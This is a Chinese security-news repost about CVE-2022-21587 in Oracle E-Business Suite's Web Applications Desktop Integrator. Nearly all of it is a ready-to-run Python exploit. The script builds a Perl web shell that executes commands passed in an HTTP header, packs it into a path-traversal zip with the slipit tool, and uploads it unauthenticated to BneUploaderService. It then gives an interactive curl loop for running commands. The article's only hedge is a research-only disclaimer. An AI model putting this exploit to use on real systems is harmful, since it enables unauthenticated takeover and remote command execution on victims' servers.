漏洞速递 | CVE-2022-21587漏洞(附EXP)

admin 2023年2月12日13:52:33评论1,405 views1字数 1747阅读5分49秒阅读模式


0x01 前言

CVE-2022-21587漏洞允许未经身份验证的攻击者通过 HTTP 进行网络访问,从而破坏 Oracle Web Applications Desktop Integrator。成功利用此漏洞可导致 Oracle Web Applications Desktop Integrator 被接管

需要安装python3 slipit依赖

安装 slipit:1.git clone https://github.com/usdAG/slipit2.cd slipit3.python3 setup.py sdist4.pip3 install --user dist/*5.export PATH=/home/yourname/.local/bin:$PATH


0x02 Poc

POC内容,需要自行填充shell内容

#!/usr/bin/python3#POC by HMs#CVE-2022-21587
import requestsimport osimport sys

shell = ''' use CGI;print CGI::header( -type => 'text/plain' );my $cmd = CGI::http('HTTP_CMD');print system($cmd);exit 0;'''
def Write_Shell(): with open("txkFNDWRR.pl", "w") as f: f.writelines("%s n" %(shell)) os.system("slipit --overwrite --separator '/' --depth 5 --prefix '/FMW_Home/Oracle_EBS-app1/common/scripts/' txkFNDWRR.zip txkFNDWRR.pl") os.system("uuencode txkFNDWRR.zip txkFNDWRR.zip > t.uue")
def exploit(): Write_Shell() host = sys.argv[1] if host.endswith == '/': url = host + 'OA_HTML/BneUploaderService?bne:uueupload=true' url_shell = host + '/OA_CGI/FNDWRR.exe' else: url = host + '/OA_HTML/BneUploaderService?bne:uueupload=true' url_shell = host + '/OA_CGI/FNDWRR.exe' file = 't.uue' up = { 'text':(file,open(file, 'rb'), "multipart/mixed" ) } request = requests.post(url,files=up) if request.status_code == 200: print('n-----------------------------------n[+] Exploiting .......nShell has uploaded!n-----------------------------------n') print('`press q || Q || quit to exit !!!` nn') print('`exploit: python3 http|https://example.com` nn') while True: cmd = input("~shell[~]: ") if cmd == 'q' or cmd == 'quit' or cmd == 'Q': break else: os.system("curl -ks '%s' -H 'cmd: %s'" % (url_shell,cmd)) else: print('not vuln!')
if __name__ == '__main__': exploit()


0x03 漏洞分析参考

https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis?referrer=notificationEmail

0x01 工具介绍

1、通过阅读原文,到项目地址下载

2、点击下方名片回复" 21587 "获取

原文始发于微信公众号(EchoSec):漏洞速递 | CVE-2022-21587漏洞(附EXP)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月12日13:52:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞速递 | CVE-2022-21587漏洞(附EXP)https://cn-sec.com/archives/1548086.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息